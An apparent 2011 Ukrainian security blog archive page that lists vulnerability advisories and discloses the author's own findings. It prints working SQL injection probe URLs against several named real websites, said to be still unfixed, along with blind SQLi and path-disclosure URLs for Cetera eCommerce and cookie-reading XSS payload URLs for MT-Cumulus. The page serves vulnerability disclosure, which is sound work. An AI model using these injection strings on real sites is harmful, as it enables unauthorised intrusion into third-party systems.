Архів для категорії 'Уразливості'

Добірка уразливостей

23:58 20.05.2011

В даній добірці уразливості в веб додатках:

  • Vulnerabilities in Dovecot (деталі)
  • PHP Code Execution in Alguest (деталі)
  • HP Insight Control Power Management for Windows, Remote Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF) (деталі)
  • HP Insight Control Server Migration for Windows, Remote Cross Site Scripting (XSS), Privilege Escalation, Unauthorized Access (деталі)
  • Cookie authentication bypass in Alguest (деталі)
  • XSS vulnerability in Contenido CMS (деталі)
  • HP Insight Control Server Migration for Windows, Remote Cross Site Scripting (XSS), Privilege Escalation, Unauthorized Access (деталі)
  • HP Insight Managed System Setup Wizard for Windows, Remote Arbitrary File Download (деталі)
  • XSS vulnerability in Contenido CMS (деталі)
  • Path disclosure in BIGACE Web CMS (деталі)

Уразливості в Easy Contact для WordPress

16:23 20.05.2011

01.04.2011

У лютому, 03.02.2011, я знайшов Insufficient Anti-automation, Abuse of Functionality та Cross-Site Scripting уразливості в плагіні Easy Contact для WordPress. Дірки я виявив на одному сайті. Про що найближчим часом повідомлю розробникам плагіна.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

20.05.2011

Insufficient Anti-automation:

Відсутність капчі на сторінці контактів дозволяє слати автоматизовані повідомлення (зокрема спам) адмінам сайта. Капча виключена по замовчуванню, а тип текстової капчі Challenge Question є ненадійним, тому що значення є фіксованим.

Abuse of Functionality:

На сторінці контактів можлива відправка спама через функцію Carbon Copy (Email yourself a copy). Вона включена по замовчуванню і призводить до того, що через сайт можна розсилати спам як адміну, так і на довільні емайли.

А з використанням Insufficient Anti-automation уразливості можна автоматизовано розсилати спам з сайта в великих обсягах.

Easy Contact Abuse of Functionality.html

XSS:

Плагін Easy Contact зроблений на основі плагіна WP-ContactForm і тому дані XSS аналогічні уразливостям в WP-ContactForm, про які я писав раніше. Але враховуючи, що в нових версіях WP покращили захисні фільтри, то я також адаптував атакуючий код до нових версій WordPress.

Easy Contact XSS.html

Easy Contact XSS-2.html

Easy Contact XSS-3.html

Easy Contact XSS-4.html

Уразливі Easy Contact 0.1.2 та попередні версії.

Уразливість на www.isfp.com.ua

18:30 18.05.2011

17.07.2010

У червні, 30.06.2010, я знайшов SQL Injection уразливість на проекті http://www.isfp.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

19.05.2011

SQL Injection:

http://www.isfp.com.ua/index.php?content_id=-1%20or%20version()%3E5

Дана уразливість досі не виправлена.

Добірка уразливостей

20:11 14.05.2011

В даній добірці уразливості в веб додатках:

  • HP Data Protector Manager v6.11 / NULL Pointer Dereference Remote Denial of Service Vulnerabilities (деталі)
  • Orbis CMS Arbitrary Script Execution Vulnerability (деталі)
  • Multiple XSS inj in Wernhart Guestbook (деталі)
  • RSA, The Security Division of EMC, announces a fix for a potential security vulnerability in RSAR Authentication Client when storing secret key objects on an RSA SecurIDR 800 Authenticator (деталі)
  • Multiple SQL injections in Wernhart Guestbook (деталі)
  • Pandora FMS Authentication Bypass and Multiple Input Validation Vulnerabilities (деталі)
  • SAP BusinessObjects Axis2 Default Admin Password (деталі)
  • Multiple vulnerabilities in BugTracker.Net (деталі)
  • Digitalus 1.10.0 Alpha2 Arbitrary File Upload vulnerability (деталі)
  • CiscoWorks Common Services Arbitrary Code Execution Vulnerability (деталі)

SQLi, FPD, AoF та IAA уразливості в Cetera eCommerce

16:06 14.05.2011

25.03.2011

У січні, 29.01.2011, я знайшов SQL Injection, Full path disclosure, Abuse of Functionality та Insufficient Anti-automation уразливості в Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru.

Раніше я вже писав про уразливості в Cetera eCommerce.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

14.05.2011

SQL Injection (blind SQLi):

http://site/catalog/’+(version()=5.1)+’/ (200 при true, 404 при false)

http://site/’+(version()=5.1)+’/ (404 при true, 200 при false)

Full path disclosure:

http://site/’/

http://site/catalog/’/

http://site/account/’/

http://site/news/’/

http://site/vendors/’/

Abuse of Functionality:

В даних функціоналах можливий витік емайлів, що є логинами в системі.

http://site/account/recoverpassword/

http://site/account/recoverpassword/code/

Insufficient Anti-automation:

В даних двох функціоналах немає захисту від автоматизованих запитів (капчі).

Уразливі Cetera eCommerce 15.0 та попередні версії. SQLi та FPD стосуються лише версії 15.0, а AoF та IAA стосуються версії 15.0 та попередніх версій. Дані уразливості досі не виправлені.

Уразливість на www.ekoterm.kiev.ua

18:09 13.05.2011

16.07.2010

У червні, 30.06.2010, я знайшов SQL Injection уразливість на проекті http://www.ekoterm.kiev.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

13.05.2011

SQL Injection:

http://www.ekoterm.kiev.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

Уразливість на www.slavske.org.ua

15:24 12.05.2011

14.07.2010

У червні, 30.06.2010, я знайшов SQL Injection уразливість на проекті http://www.slavske.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.05.2011

SQL Injection:

http://www.slavske.org.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

Уразливість в MT-Cumulus для Movable Type

23:56 11.05.2011

Раніше я вже писав про уразливість в sfWpCumulusPlugin для symfony. Така ж уразливість є і в плагіні MT-Cumulus для Movable Type, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

В березні, 14.03.2011, я знайшов Cross-Site Scripting уразливість в Flash Tag Cloud та MT-Cumulus для Movable Type. Про що найближчим часом повідомлю розробнику.

Спочатку розробник зробив віджет Flash Tag Cloud For MT 4, а вже потім зробив повноцінний плагін MT-Cumulus для Movable Type. І в обох додатках наявна дана XSS уразливість.

XSS:

Для Flash Tag Cloud For MT 4:

http://site/scripts/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Для MT-Cumulus:

http://site/mt/mt-static/plugins/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі віджет Flash Tag Cloud For MT 4 та плагін MT-Cumulus v1.02 і попереді версії.

Уразливість на www.mitsubishi-sklad.com.ua

17:05 11.05.2011

13.07.2010

У червні, 30.06.2010, я знайшов SQL Injection уразливість на проекті http://www.mitsubishi-sklad.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

11.05.2011

SQL Injection:

http://www.mitsubishi-sklad.com.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

Добірка уразливих сайтів від Dementor

23:58 10.05.2011

Пропоную вашій увазі нову добірку уразливих сайтів від Dementor (з числа українських веб сайтів). Дані уразливості він знайшов та оприлюднив в 2010-2011 роках.